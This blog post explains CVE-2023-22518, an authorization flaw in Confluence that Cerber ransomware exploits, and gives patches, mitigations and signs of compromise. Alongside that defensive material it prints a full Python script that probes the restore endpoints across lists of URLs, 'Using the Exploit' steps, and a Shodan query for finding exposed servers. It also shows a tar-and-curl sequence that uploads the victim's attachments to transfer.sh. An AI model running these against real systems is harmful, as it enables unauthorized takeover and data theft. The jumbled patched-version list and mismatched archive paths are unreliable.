Unmasking CVE-2023-22518: A Critical Security Breach in Confluence Data Center and Server

In the evolving landscape of cybersecurity, a new threat has emerged that has sent shockwaves through the community.

This threat, identified as CVE-2023-22518, is an improper authorization vulnerability that has struck at the heart of Confluence Data Center and Server.

It’s become a pressing concern not only for its potential to disrupt services but also due to its exploitation by Cerber ransomware.

This blog post aims to delve into this issue, shedding light on this vulnerability, its implications, and the steps to mitigate it.

Unpacking CVE-2023-22518

CVE-2023-22518 represents a security loophole characterized by improper authorization. This weakness is currently being exploited by cybercriminals, leading to damaging attacks such as ransomware.

The vulnerability allows an unauthenticated attacker to reset Confluence, thereby creating a Confluence instance administrator.

Assessing The Threat Level

The severity of this vulnerability cannot be overstated. It has been escalated to the highest level of critical rating, CVSS 10, due to the potential for far-reaching damage.

Exploitation of this flaw can result in unauthorized access and manipulation of your Confluence instances, posing a serious risk of data exposure or loss.

Scope of The Vulnerability

The vulnerability has been found in all versions of Confluence Data Center and Server, making it a widespread problem.

Understanding the Exploitation Class and Known Attack Vectors

This vulnerability falls under the Improper Authorization exploitation class, specifically CWE-285 / CWE-266.

The recognized vectors for the attack are:

/json/setup-restore.action
/json/setup-restore-local.action
/json/setup-restore-progress.action
/server-info.action

Testing for Vulnerability using Python

A Python script intended for testing has been shared by a user on GitHub.

Here’s a simple example of testing for this vulnerability using Python:

import requests
import random
import string
import argparse
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def random_string(length=10):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(length))

def post_setup_restore(baseurl):
    paths = ["/json/setup-restore.action", "/json/setup-restore-local.action", "/json/setup-restore-progress.action", "/server-info.action"]
    for path in paths:
        url = f"{baseurl.rstrip('/')}{path}"

        headers = {
            "X-Atlassian-Token": "no-check",
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7"
        }

        rand_str = random_string()
        data = (
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
            "Content-Disposition: form-data; name=\"buildIndex\"\r\n\r\n"
            "true\r\n"
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
            f"Content-Disposition: form-data; name=\"file\";filename=\"{rand_str}.zip\"\r\n\r\n"
            f"{rand_str}\r\n"
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
            "Content-Disposition: form-data; name=\"edit\"\r\n\r\n"
            "Upload and import\r\n"
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7--\r\n"
        )

        try:
            response = requests.post(url, headers=headers, data=data.encode('utf-8'), timeout=10, verify=False)

            if (response.status_code == 200 and
                'The zip file did not contain an entry' in response.text and 
                'exportDescriptor.properties' in response.text):
                print(f"[+] Vulnerable to CVE-2023-22518 on host {url}!")
            else:
                print(f"[-] Not vulnerable to CVE-2023-22518 for host {url}.")
        except requests.RequestException as e:
            print(f"[*] Error connecting to {url}. Error: {e}")

def main():
    parser = argparse.ArgumentParser(description="Post setup restore script")
    parser.add_argument('--url', help='The URL to target', required=False)
    parser.add_argument('--file', help='Filename containing a list of URLs', required=False)
    args = parser.parse_args()

    if args.url:
        post_setup_restore(args.url)
    elif args.file:
        with open(args.file, 'r') as f:
            for line in f:
                url = line.strip()
                if url:
                    post_setup_restore(url)
    else:
        print("You must provide either --url or --file argument.")

if __name__ == "__main__":
    main()

Using the Exploit

To use the exploit, enter the following command:

python3 exploit.py

Then, enter the requested information as follows:

URL: http://REDACTED:8090/json/setup-restore.action?synchronous=true
Path to the .zip file: /path/xmlexport-20231109-060519-1.zip

Use the following search query to find vulnerable instances on Shodan1:

http.favicon.hash:-305179312

When you reset Confluence leveraging this vulnerability, you’ll find the directory %CONFLUENCE_HOME%/attachments chock-full of files.

Extracting them is simple, and you can identify their extensions using the Linux file command.

For instance:

file /var/lib/confluence/attachments/v4/191/28/77273124/77273124.1

The result might be:

/var/lib/confluence/attachments/v4/191/28/77273124/77273124.1: PNG image data, 442 x 170, 8-bit/color RGBA, non-interlaced

Archiving and Extracting Directories

Here’s how to easily archive a directory and extract the archive:

tar -czvf /var/atlassian/application-data/confluence/attachments_backup.tar.gz /var/atlassian/application-data/confluence/attachments

Then, upload the archive:

curl --upload-file /var/atlassian/application-data/attachments_backup.tar.gz https://transfer.sh/attachments_backup.tar.gz

The result will be a downloadable link like this:

https://transfer.sh/***********/attachments_backup.tar.gz

Addressing The Issue: Patched Versions

To counteract this vulnerability, Atlassian has released patches for versions 7.19.168.3.48.4.48.5.38.6.1.

Users operating these versions are advised to immediately implement these patches.

Steps To Mitigate The Risk

For those unable to promptly apply the patch, the following steps are recommended:

  1. Implement temporary mitigations
  2. Regularly back up your instance
  3. If possible, disconnect your instance from the internet until the patch can be applied
  4. If the above steps are not feasible, you can still reduce known attack vectors by blocking access to the following endpoints on Confluence instances: /json/setup-restore.action, /json/setup-restore-local.action, /json/setup-restore-progress.action.

Identifying The Threat

It is crucial to monitor all affected Confluence instances for signs of compromise. Possible indicators of a breach include:

  • Inability to log in to the instance
  • Network access logs showing requests to /json/setup-restore*
  • Installation of unknown plugins
  • Detection of a malicious plugin named web.shell.Plugin
  • Encrypted or corrupted files
  • Unexpected additions to the confluence-administrators group
  • Creation of new user accounts without authorization.

This critical vulnerability demands immediate attention and action from all users to ensure the security of their systems.

Conclusion

The emergence of CVE-2023-22518 has underscored the critical importance of maintaining robust cybersecurity measures.

This improper authorization vulnerability in Confluence Data Center and Server presents a potent threat that can lead to significant data loss.

By understanding the nature of this security breach and taking proactive measures, it’s possible to mitigate its potential damage.

The Python script provided in this blog serves as a useful tool for testing the vulnerability in your Confluence servers.

Furthermore, the Shodan search and Linux file command can aid in identifying and managing the files affected by this breach.

Lastly, remember to regularly back up your directories to safeguard your data.

Cybersecurity is an evolving landscape, with new threats emerging constantly. Staying informed and prepared is our best defense against these threats.

As we continue to navigate this complex terrain, let’s remain vigilant and proactive, ensuring our systems are secure and our data protected.